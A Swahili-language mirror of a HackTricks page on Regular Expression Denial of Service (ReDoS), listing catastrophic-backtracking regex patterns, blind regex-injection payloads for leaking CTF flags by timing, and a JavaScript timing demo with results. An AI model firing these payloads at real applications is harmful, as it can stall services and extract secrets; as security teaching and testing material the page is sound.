mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-12 06:12:55 +00:00
103 lines
6.5 KiB
Markdown
103 lines
6.5 KiB
Markdown
# Uharibifu wa Mfumo wa Kanuni ya Kawaida - ReDoS
|
|
|
|
<details>
|
|
|
|
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
|
|
|
Njia nyingine za kusaidia HackTricks:
|
|
|
|
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
|
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
|
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
|
|
|
</details>
|
|
|
|
# Uharibifu wa Mfumo wa Kanuni ya Kawaida (ReDoS)
|
|
|
|
**Uharibifu wa Mfumo wa Kanuni ya Kawaida (ReDoS)** hutokea wakati mtu anatumia udhaifu katika jinsi kanuni za kawaida (njia ya kutafuta na kulinganisha mifano katika maandishi) zinafanya kazi. Mara nyingi, wakati kanuni za kawaida zinapotumiwa, zinaweza kuwa polepole sana, hasa ikiwa kipande cha maandishi wanachofanya kazi nacho kinakuwa kikubwa. Uvivu huu unaweza kuwa mbaya sana hata kwa ongezeko dogo la ukubwa wa maandishi. Wadukuzi wanaweza kutumia tatizo hili kufanya programu inayotumia kanuni za kawaida isifanye kazi vizuri kwa muda mrefu.
|
|
|
|
## Algorithm ya Kawaida ya Kanuni ya Kawaida Inayosababisha Tatizo
|
|
|
|
**Angalia maelezo katika [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)**
|
|
|
|
## Kanuni za Uovu <a href="#evil-regexes" id="evil-regexes"></a>
|
|
|
|
Kanuni ya kawaida ya uovu ni ile inayoweza **kukwama kwenye kuingiza kilichoundwa na kusababisha DoS**. Kawaida, mifano ya kanuni ya uovu ina kikundi kinachorudiwa na kurudia au kubadilishana na kuvuka ndani ya kikundi kilichorudiwa. Baadhi ya mifano ya kanuni za uovu ni pamoja na:
|
|
|
|
* (a+)+
|
|
* ([a-zA-Z]+)*
|
|
* (a|aa)+
|
|
* (a|a?)+
|
|
* (.*a){x} kwa x > 10
|
|
|
|
Zote hizo zina hatari kwa kuingiza `aaaaaaaaaaaaaaaaaaaaaaaa!`.
|
|
|
|
## Malipo ya ReDoS
|
|
|
|
### Uchunguzi wa Nakala kupitia ReDoS
|
|
|
|
Katika CTF (au bug bounty) labda unadhibiti Kanuni ya kawaida ambayo habari nyeti (bendera) inalingana nayo. Kwa hivyo, inaweza kuwa na manufaa kufanya **ukurasa uweze kufungia (kutumia muda mrefu au muda mrefu zaidi)** ikiwa **Kanuni ya kawaida inalingana** na **sio kama haifanyi**. Kwa njia hii utaweza **kuchukua** herufi **kwa herufi**:
|
|
|
|
* Katika [**chapisho hili**](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) unaweza kupata sheria hii ya ReDoS: `^(?=<flag>)((.*)*)*salt$`
|
|
* Mfano: `^(?=HTB{sOmE_fl§N§)((.*)*)*salt$`
|
|
* Katika [**chapisho hili**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) unaweza kupata hii:`<flag>(((((((.*)*)*)*)*)*)*)!`
|
|
* Katika [**chapisho hili**](https://ctftime.org/writeup/25869) alitumia: `^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$`
|
|
|
|
### Udhibiti wa Kuingiza na Kanuni ya Kawaida ya ReDoS
|
|
|
|
Zifuatazo ni mifano ya **ReDoS** ambapo unadhibiti **kuingiza** na **kanuni ya kawaida**:
|
|
```javascript
|
|
function check_time_regexp(regexp, text){
|
|
var t0 = new Date().getTime();;
|
|
new RegExp(regexp).test(text);
|
|
var t1 = new Date().getTime();;
|
|
console.log("Regexp " + regexp + " took " + (t1 - t0) + " milliseconds.")
|
|
}
|
|
|
|
// This payloads work because the input has several "a"s
|
|
[
|
|
// "((a+)+)+$", //Eternal,
|
|
// "(a?){100}$", //Eternal
|
|
"(a|a?)+$",
|
|
"(\\w*)+$", //Generic
|
|
"(a*)+$",
|
|
"(.*a){100}$",
|
|
"([a-zA-Z]+)*$", //Generic
|
|
"(a+)*$",
|
|
].forEach(regexp => check_time_regexp(regexp, "aaaaaaaaaaaaaaaaaaaaaaaaaa!"))
|
|
|
|
/*
|
|
Regexp (a|a?)+$ took 5076 milliseconds.
|
|
Regexp (\w*)+$ took 3198 milliseconds.
|
|
Regexp (a*)+$ took 3281 milliseconds.
|
|
Regexp (.*a){100}$ took 1436 milliseconds.
|
|
Regexp ([a-zA-Z]+)*$ took 773 milliseconds.
|
|
Regexp (a+)*$ took 723 milliseconds.
|
|
*/
|
|
```
|
|
## Vifaa
|
|
|
|
* [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit)
|
|
* [https://devina.io/redos-checker](https://devina.io/redos-checker)
|
|
|
|
## Marejeo
|
|
* [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
|
|
* [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets)
|
|
* [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html)
|
|
* [https://ctftime.org/writeup/25869](https://ctftime.org/writeup/25869)
|
|
|
|
<details>
|
|
|
|
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Njia nyingine za kusaidia HackTricks:
|
|
|
|
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
|
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
|
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|